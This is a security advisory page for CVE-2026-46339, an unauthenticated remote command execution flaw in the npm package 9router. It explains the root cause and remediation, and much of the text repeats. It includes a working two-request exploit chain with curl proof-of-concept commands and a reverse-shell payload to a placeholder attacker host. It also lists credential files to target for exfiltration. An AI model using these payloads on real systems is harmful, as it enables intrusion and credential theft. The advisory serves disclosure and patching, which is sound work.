Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
10.0
CVE-2026-46339: 9router: Unauthenticated Remote Code Execution via Unprotected Routes
GHSA-fhh6-4qxv-rpqj
CVE-2026-46339
Summary
The 9router software exposes unauthenticated API endpoints that can be used to execute arbitrary OS commands without any prerequisites or credentials. This vulnerability exists because the authentication middleware only guards a limited set of routes, leaving many others unprotected. To mitigate this issue, ensure that all API endpoints are properly authenticated and authorized.
What to do
- Update decolua 9router to version 0.4.37.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | decolua | 9router |
>= 0.4.30, < 0.4.37 Fix: upgrade to 0.4.37
|
Original title
9router: Unauthenticated Remote Code Execution via unprotected MCP custom plugin routes
Original description
## Summary
9router exposes two unauthenticated API endpoints that, when chained together, allow any network-adjacent attacker to execute arbitrary OS commands as the user running the 9router process — with **zero prerequisites** and **no credentials required**.
The vulnerability exists because the Next.js middleware that enforces authentication (`src/proxy.js`) only guards 8 explicitly listed routes. The attack surface of `/api/cli-tools/*` and `/api/mcp/*` (40+ routes) receives **no authentication whatsoever**.
---
## Root Cause
### 1. Middleware Allowlist Is Too Narrow
**File:** `src/proxy.js`
```js
export const config = {
matcher: [
"/",
"/dashboard/:path*",
"/api/shutdown",
"/api/settings/:path*",
"/api/keys",
"/api/keys/:path*",
"/api/providers/client",
"/api/provider-nodes/validate",
],
};
```
Next.js middleware only runs on routes matching this list. Routes NOT listed — including `/api/cli-tools/*` and `/api/mcp/*` — bypass the `dashboardGuard` auth check entirely.
### 2. Unguarded Endpoint Accepts Arbitrary Command Registration
**File:** `src/app/api/cli-tools/cowork-settings/route.js`, lines 292–319
```js
export async function POST(request) {
const { baseUrl, apiKey, models, plugins, localPlugins, customPlugins } = await request.json();
// ...
const customPluginsArray = Array.isArray(customPlugins) ? customPlugins : [];
if (customPluginsArray.length > 0) {
const { registerCustomPlugin } = require("@/lib/mcp/stdioSseBridge");
const stdioCustoms = customPluginsArray
.filter((p) => p.command)
.map((p) => ({
name: p.name,
command: p.command, // ← attacker-controlled, no validation
args: p.args || [], // ← attacker-controlled, no validation
}));
for (const p of stdioCustoms) registerCustomPlugin(p); // stores in globalThis
}
}
```
The `command` and `args` fields from the attacker's JSON are stored verbatim into `globalThis.__9routerCustomPlugins` — a process-global Map that survives Hot Module Replacement.
**File:** `src/lib/mcp/stdioSseBridge.js`, lines 114–116
```js
function registerCustomPlugin(def) {
getCustomStore().set(def.name, def); // no validation of command/args
}
```
### 3. Unguarded SSE Endpoint Triggers `spawn()` with Stored Command
**File:** `src/app/api/mcp/[plugin]/sse/route.js`, lines 6–25
```js
export async function GET(request, { params }) {
const { plugin } = await params;
if (!findPlugin(plugin)) return new Response(`Unknown plugin: ${plugin}`, { status: 404 });
const stream = new ReadableStream({
start(controller) {
sid = registerSession(plugin, send); // ← spawn() called here
},
});
return new Response(stream, { ... });
}
```
**File:** `src/lib/mcp/stdioSseBridge.js`, line 138
```js
const proc = spawn(plugin.command, plugin.args, {
stdio: ["pipe", "pipe", "pipe"],
env: process.env, // inherits full environment
});
```
`spawn()` is called with `shell: false` (default), but since the attacker controls **both** `plugin.command` (the binary path) and `plugin.args`, this is equivalent to arbitrary command execution.
---
## Attack Chain
```
Attacker (no credentials)
│
│ Step 1 — Register malicious plugin (POST, no auth)
▼
POST /api/cli-tools/cowork-settings
Content-Type: application/json
{
"baseUrl": "x", "apiKey": "x", "models": ["x"],
"customPlugins": [{
"name": "rev",
"command": "/bin/bash",
"args": ["-c", "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"]
}]
}
← {"success":true, ...}
│ Step 2 — Trigger spawn() via SSE endpoint (GET, no auth)
▼
GET /api/mcp/rev/sse
← SSE stream opens → spawn("/bin/bash", ["-c", "bash -i >& /dev/tcp/..."])
← Reverse shell connects to attacker
```
**Time to exploit from first request:** < 2 seconds.
**Prerequisites:** Network access to port 20128 (Docker default: `0.0.0.0:20128`).
---
## Proof of Concept
### PoC 1 — File Write (no listener required)
```bash
# Step 1: Register payload
curl -X POST "http://TARGET:20128/api/cli-tools/cowork-settings" \
-H 'Content-Type: application/json' \
-d '{
"baseUrl":"x","apiKey":"x","models":["x"],
"customPlugins":[{
"name":"rce1",
"command":"/bin/sh",
"args":["-c","{ id; whoami; hostname; uname -a; } > /tmp/pwned.txt"]
}]
}'
# → {"success":true,...}
# Step 2: Trigger
curl -N --max-time 3 "http://TARGET:20128/api/mcp/rce1/sse" >/dev/null 2>&1
# Verify
cat /tmp/pwned.txt
```
**Observed output (on local test instance):**
```
uid=1000(sondt23) gid=1000(sondt23) groups=...,983(docker),984(ollama)
sondt23
VSOC-sondt23-L
Linux VSOC-sondt23-L 6.17.0-23-generic ... x86_64 GNU/Linux
```
### PoC 2 — Automated PoC script
```bash
# File write mode (for report)
python3 poc.py --target http://TARGET:20128 --mode file
# Reverse shell mode (interactive)
python3 poc.py --target http://TARGET:20128 --mode shell --lhost ATTACKER_IP --lport 4444
```
The script (`poc.py`) is included in this advisory.
---
## Impact
| Category | Detail |
|---|---|
| **Confidentiality** | Full read access to server filesystem — API keys, TLS private keys, `~/.claude/settings.json` (Anthropic tokens), AWS credentials |
| **Integrity** | Arbitrary file write, persistence via cron/systemd |
| **Availability** | Process termination, resource exhaustion |
| **Lateral movement** | `docker` group membership (confirmed in test) allows full container escape → host root |
| **Scope** | Remote, unauthenticated, network-accessible |
### High-value exfiltration targets on a typical 9router host
- `~/.claude/settings.json` — `ANTHROPIC_AUTH_TOKEN`
- `~/.aws/credentials`, `~/.aws/sso/cache/*.json` — AWS keys
- `$DATA_DIR/db.sqlite` — 9router local database (all stored API keys, provider configs)
- TLS private keys managed by the MITM proxy (`src/mitm/`)
---
## Affected Versions
| Version | Affected | Notes |
|---|---|---|
| < v0.4.30 | No | `cowork-settings` and MCP SSE bridge did not exist |
| v0.4.30 | **Yes** | Introduced in commit `8f4d29c` (2026-05-11) |
| v0.4.31 | **Yes** | |
| v0.4.32 | **Yes** | |
| v0.4.33 | **Yes** | Latest at time of disclosure |
The vulnerability was introduced when the MCP stdio→SSE bridge feature was added in v0.4.30. The middleware matcher was not updated to protect the new routes.
---
## Remediation
### Fix 1 — Extend middleware matcher (minimal fix)
**File:** `src/proxy.js`
```js
export const config = {
matcher: [
"/",
"/dashboard/:path*",
"/api/shutdown",
"/api/settings/:path*",
"/api/keys",
"/api/keys/:path*",
"/api/providers/client",
"/api/provider-nodes/validate",
// ADD these:
"/api/cli-tools/:path*",
"/api/mcp/:path*",
],
};
```
### Fix 2 — Validate `command` in `registerCustomPlugin` (defense-in-depth)
**File:** `src/lib/mcp/stdioSseBridge.js`
```js
const ALLOWED_MCP_COMMANDS = new Set(["npx", "node", "uvx", "python3", "python"]);
function registerCustomPlugin(def) {
const bin = def.command?.split("/").pop(); // basename only
if (!ALLOWED_MCP_COMMANDS.has(bin)) {
throw new Error(`Blocked: command '${def.command}' not in allowlist`);
}
getCustomStore().set(def.name, def);
}
```
### Fix 3 — Sanitize `customPlugins` at the API boundary
**File:** `src/app/api/cli-tools/cowork-settings/route.js`, line 312
```js
const stdioCustoms = customPluginsArray
.filter((p) => p.command && typeof p.command === "string")
.filter((p) => ALLOWED_COMMANDS.has(path.basename(p.command))) // allowlist check
.map((p) => ({
name: String(p.name).replace(/[^a-zA-Z0-9_-]/g, ""), // sanitize name
command: p.command,
args: (p.args || []).map(String),
}));
```
**All three fixes should be applied together.** Fix 1 alone is sufficient to prevent exploitation from unauthenticated attackers, but Fixes 2 and 3 provide defense-in-depth against authenticated users abusing the feature.
---
9router exposes two unauthenticated API endpoints that, when chained together, allow any network-adjacent attacker to execute arbitrary OS commands as the user running the 9router process — with **zero prerequisites** and **no credentials required**.
The vulnerability exists because the Next.js middleware that enforces authentication (`src/proxy.js`) only guards 8 explicitly listed routes. The attack surface of `/api/cli-tools/*` and `/api/mcp/*` (40+ routes) receives **no authentication whatsoever**.
---
## Root Cause
### 1. Middleware Allowlist Is Too Narrow
**File:** `src/proxy.js`
```js
export const config = {
matcher: [
"/",
"/dashboard/:path*",
"/api/shutdown",
"/api/settings/:path*",
"/api/keys",
"/api/keys/:path*",
"/api/providers/client",
"/api/provider-nodes/validate",
],
};
```
Next.js middleware only runs on routes matching this list. Routes NOT listed — including `/api/cli-tools/*` and `/api/mcp/*` — bypass the `dashboardGuard` auth check entirely.
### 2. Unguarded Endpoint Accepts Arbitrary Command Registration
**File:** `src/app/api/cli-tools/cowork-settings/route.js`, lines 292–319
```js
export async function POST(request) {
const { baseUrl, apiKey, models, plugins, localPlugins, customPlugins } = await request.json();
// ...
const customPluginsArray = Array.isArray(customPlugins) ? customPlugins : [];
if (customPluginsArray.length > 0) {
const { registerCustomPlugin } = require("@/lib/mcp/stdioSseBridge");
const stdioCustoms = customPluginsArray
.filter((p) => p.command)
.map((p) => ({
name: p.name,
command: p.command, // ← attacker-controlled, no validation
args: p.args || [], // ← attacker-controlled, no validation
}));
for (const p of stdioCustoms) registerCustomPlugin(p); // stores in globalThis
}
}
```
The `command` and `args` fields from the attacker's JSON are stored verbatim into `globalThis.__9routerCustomPlugins` — a process-global Map that survives Hot Module Replacement.
**File:** `src/lib/mcp/stdioSseBridge.js`, lines 114–116
```js
function registerCustomPlugin(def) {
getCustomStore().set(def.name, def); // no validation of command/args
}
```
### 3. Unguarded SSE Endpoint Triggers `spawn()` with Stored Command
**File:** `src/app/api/mcp/[plugin]/sse/route.js`, lines 6–25
```js
export async function GET(request, { params }) {
const { plugin } = await params;
if (!findPlugin(plugin)) return new Response(`Unknown plugin: ${plugin}`, { status: 404 });
const stream = new ReadableStream({
start(controller) {
sid = registerSession(plugin, send); // ← spawn() called here
},
});
return new Response(stream, { ... });
}
```
**File:** `src/lib/mcp/stdioSseBridge.js`, line 138
```js
const proc = spawn(plugin.command, plugin.args, {
stdio: ["pipe", "pipe", "pipe"],
env: process.env, // inherits full environment
});
```
`spawn()` is called with `shell: false` (default), but since the attacker controls **both** `plugin.command` (the binary path) and `plugin.args`, this is equivalent to arbitrary command execution.
---
## Attack Chain
```
Attacker (no credentials)
│
│ Step 1 — Register malicious plugin (POST, no auth)
▼
POST /api/cli-tools/cowork-settings
Content-Type: application/json
{
"baseUrl": "x", "apiKey": "x", "models": ["x"],
"customPlugins": [{
"name": "rev",
"command": "/bin/bash",
"args": ["-c", "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"]
}]
}
← {"success":true, ...}
│ Step 2 — Trigger spawn() via SSE endpoint (GET, no auth)
▼
GET /api/mcp/rev/sse
← SSE stream opens → spawn("/bin/bash", ["-c", "bash -i >& /dev/tcp/..."])
← Reverse shell connects to attacker
```
**Time to exploit from first request:** < 2 seconds.
**Prerequisites:** Network access to port 20128 (Docker default: `0.0.0.0:20128`).
---
## Proof of Concept
### PoC 1 — File Write (no listener required)
```bash
# Step 1: Register payload
curl -X POST "http://TARGET:20128/api/cli-tools/cowork-settings" \
-H 'Content-Type: application/json' \
-d '{
"baseUrl":"x","apiKey":"x","models":["x"],
"customPlugins":[{
"name":"rce1",
"command":"/bin/sh",
"args":["-c","{ id; whoami; hostname; uname -a; } > /tmp/pwned.txt"]
}]
}'
# → {"success":true,...}
# Step 2: Trigger
curl -N --max-time 3 "http://TARGET:20128/api/mcp/rce1/sse" >/dev/null 2>&1
# Verify
cat /tmp/pwned.txt
```
**Observed output (on local test instance):**
```
uid=1000(sondt23) gid=1000(sondt23) groups=...,983(docker),984(ollama)
sondt23
VSOC-sondt23-L
Linux VSOC-sondt23-L 6.17.0-23-generic ... x86_64 GNU/Linux
```
### PoC 2 — Automated PoC script
```bash
# File write mode (for report)
python3 poc.py --target http://TARGET:20128 --mode file
# Reverse shell mode (interactive)
python3 poc.py --target http://TARGET:20128 --mode shell --lhost ATTACKER_IP --lport 4444
```
The script (`poc.py`) is included in this advisory.
---
## Impact
| Category | Detail |
|---|---|
| **Confidentiality** | Full read access to server filesystem — API keys, TLS private keys, `~/.claude/settings.json` (Anthropic tokens), AWS credentials |
| **Integrity** | Arbitrary file write, persistence via cron/systemd |
| **Availability** | Process termination, resource exhaustion |
| **Lateral movement** | `docker` group membership (confirmed in test) allows full container escape → host root |
| **Scope** | Remote, unauthenticated, network-accessible |
### High-value exfiltration targets on a typical 9router host
- `~/.claude/settings.json` — `ANTHROPIC_AUTH_TOKEN`
- `~/.aws/credentials`, `~/.aws/sso/cache/*.json` — AWS keys
- `$DATA_DIR/db.sqlite` — 9router local database (all stored API keys, provider configs)
- TLS private keys managed by the MITM proxy (`src/mitm/`)
---
## Affected Versions
| Version | Affected | Notes |
|---|---|---|
| < v0.4.30 | No | `cowork-settings` and MCP SSE bridge did not exist |
| v0.4.30 | **Yes** | Introduced in commit `8f4d29c` (2026-05-11) |
| v0.4.31 | **Yes** | |
| v0.4.32 | **Yes** | |
| v0.4.33 | **Yes** | Latest at time of disclosure |
The vulnerability was introduced when the MCP stdio→SSE bridge feature was added in v0.4.30. The middleware matcher was not updated to protect the new routes.
---
## Remediation
### Fix 1 — Extend middleware matcher (minimal fix)
**File:** `src/proxy.js`
```js
export const config = {
matcher: [
"/",
"/dashboard/:path*",
"/api/shutdown",
"/api/settings/:path*",
"/api/keys",
"/api/keys/:path*",
"/api/providers/client",
"/api/provider-nodes/validate",
// ADD these:
"/api/cli-tools/:path*",
"/api/mcp/:path*",
],
};
```
### Fix 2 — Validate `command` in `registerCustomPlugin` (defense-in-depth)
**File:** `src/lib/mcp/stdioSseBridge.js`
```js
const ALLOWED_MCP_COMMANDS = new Set(["npx", "node", "uvx", "python3", "python"]);
function registerCustomPlugin(def) {
const bin = def.command?.split("/").pop(); // basename only
if (!ALLOWED_MCP_COMMANDS.has(bin)) {
throw new Error(`Blocked: command '${def.command}' not in allowlist`);
}
getCustomStore().set(def.name, def);
}
```
### Fix 3 — Sanitize `customPlugins` at the API boundary
**File:** `src/app/api/cli-tools/cowork-settings/route.js`, line 312
```js
const stdioCustoms = customPluginsArray
.filter((p) => p.command && typeof p.command === "string")
.filter((p) => ALLOWED_COMMANDS.has(path.basename(p.command))) // allowlist check
.map((p) => ({
name: String(p.name).replace(/[^a-zA-Z0-9_-]/g, ""), // sanitize name
command: p.command,
args: (p.args || []).map(String),
}));
```
**All three fixes should be applied together.** Fix 1 alone is sufficient to prevent exploitation from unauthenticated attackers, but Fixes 2 and 3 provide defense-in-depth against authenticated users abusing the feature.
---
ghsa CVSS3.1
10.0
Vulnerability type
CWE-78
OS Command Injection
CWE-306
Missing Authentication for Critical Function
Published: 19 May 2026 · Updated: 19 May 2026 · First seen: 19 May 2026